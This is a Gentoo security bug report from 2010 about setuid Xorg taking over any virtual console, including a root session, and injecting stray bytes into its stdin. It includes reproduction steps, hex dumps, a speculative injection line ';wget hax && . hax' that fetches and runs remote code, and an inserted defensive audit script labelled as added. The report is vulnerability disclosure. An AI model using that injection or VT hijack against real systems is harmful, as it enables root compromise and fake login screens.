Bug 308159 - Xorg from x11-base/xorg-server-1.6.5-r1 can take over any VT
Summary: Xorg from x11-base/xorg-server-1.6.5-r1 can take over any VT
Status: RESOLVED INVALID
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Auditing
Hardware: AMD64 Linux
Importance: High major
Assignee: Gentoo Security
URL:
Whiteboard:
Keywords:
Depends on:
Blocks:
 
Reported: 2010-03-07 07:08 UTC by Longpoke
Modified: 2016-02-17 12:52 UTC
CC: 1 user

See Also:
Package list:
Runtime testing required: ---


Description Longpoke 2010-03-07 07:08:45 UTC
Xorg can take over any VT it wants... including one with a current root session. Additionally, arbitrary data is sent to stdin on the target VT.

Steps to reproduce:
1) On vt1 login as root and run "cat > test <<EOF"
2) On vt2 login as any user and run "Xorg vt1"
3) observe that you can no longer do anything on the root session on vt1 because it's been hijacked
4) kill Xorg
5) Return to vt1 and press enter, then type "EOF", then press enter
6) run "xxd test" and observe garbage data in it

I did this a few times and got this garbage:

$ xxd /tmp/test
0000000: 979c 2e64 2f78 6d65 a09d 2073 746f 700a  ...d/xme.. stop.

hmm, I have a file called /etc/init.d/me, and was running the commands "/etc/init.d/xme start" and "/etc/init.d/xme stop" before... but these were run in vt1 in the context of the reproduction steps. Maybe the user on vt2 has some control over this data source, in which case, he can just spam this data source with ";wget hax && . hax\n" then run "Xorg vt1"...

$ xxd /tmp/test2
0000000: 9791 a323 9e94 9c30 b026 a623 9ea3 9c38  ...#...0.&.#...8
0000010: 3838 3838 3838 383c bcb8 38bc 3c0a       8888888<..8.<.
$ xxd /tmp/test3
0000000: 9c38 3cbc b838 3838 3838 3838 3838 3838  .8<..88888888888
0000010: 3838 383c bcbb 3cbc 3bbb 9db8 3cbc 9db8  888<..<.;...<...
0000020: 3b0a                                     ;.
$ xxd /tmp/test4
0000000: a39c 239f 9293 a386 8485 889c 8588 8685  ..#.............
0000010: 9c9c 3cbc 9db8 0a                        ..<....

Consequences:
1) Any user can block out any VT with a blank Xorg
2) Any user can put a fake login screen on any VT
3) Any user can cause arbitrary data to be sent to stdin of any VT, so if the target VT is running bash, that data may be executed as a bash command. I'm not sure if there is any way to control the arbitrary data.

Why does Xorg even have the vt option if it's setuid? Is there some way to control which VTs it can use? In case you're wondering, you can also take over existing X displays, in which case the two displays are superimposed into one image, it's weird... I'll try and get a picture with a camera later because scrot just takes a picture of what the session *should* look like.
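The precondition for what the report describes is an X server binary installed setuid root, since only then can an unprivileged user hand it a "vtN" argument. The following audit script is an added example, not code from the bug report or from Gentoo: it checks whether the X server on PATH is setuid root and lists the owner and mode of the VT devices, so an administrator can see at a glance whether this exposure applies. It assumes GNU coreutils `stat` and the usual `/dev/ttyN` device names.

```shell
#!/bin/sh
# Added audit helper (hypothetical, not part of the bug report).
# Reports whether the X server binary is setuid root and who owns the VTs.

# Return 0 if an octal mode string (e.g. 4755, 04755, 6755) has the setuid bit.
# A leading 0 is prepended so the shell parses the value as octal.
has_setuid_bit() {
    [ $(( 0$1 & 04000 )) -ne 0 ]
}

# Print "path mode owner" for the X server binary, following symlinks
# (X is commonly a symlink to Xorg). Returns 1 if no server is on PATH.
xorg_status() {
    bin=$(command -v Xorg 2>/dev/null) || bin=$(command -v X 2>/dev/null) || return 1
    stat -L -c '%n %a %U' "$bin"
}

# List mode and owner of the first twelve VT devices that exist.
vt_owners() {
    for tty in /dev/tty[1-9] /dev/tty1[0-2]; do
        [ -e "$tty" ] && stat -c '%n %a %U' "$tty"
    done
    return 0
}

audit_xorg_vt() {
    status=$(xorg_status) || { echo "no X server binary on PATH"; return 0; }
    set -- $status   # $1=path $2=octal mode $3=owner
    if [ "$3" = root ] && has_setuid_bit "$2"; then
        echo "$1 is setuid root (mode $2): local users can start it with a vtN argument"
    else
        echo "$1 is not setuid root (mode $2, owner $3)"
    fi
    echo "VT device ownership:"
    vt_owners
    return 0
}

audit_xorg_vt
```

On systems whose X server supports running without root privileges, removing the setuid bit is the direct mitigation; where it must stay setuid, the VT device ownership listing shows which sessions a hijacked VT would affect.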
Comment 1 Paweł Hajdan, Jr. (RETIRED) gentoo-dev 2011-01-10 12:34:36 UTC
X11 Team, could you advise?
Comment 2 Aaron Bauman (RETIRED) gentoo-dev 2016-02-17 12:52:31 UTC
Cannot reproduce in current versions.  Bug is also outdated.  Please reopen if you disagree.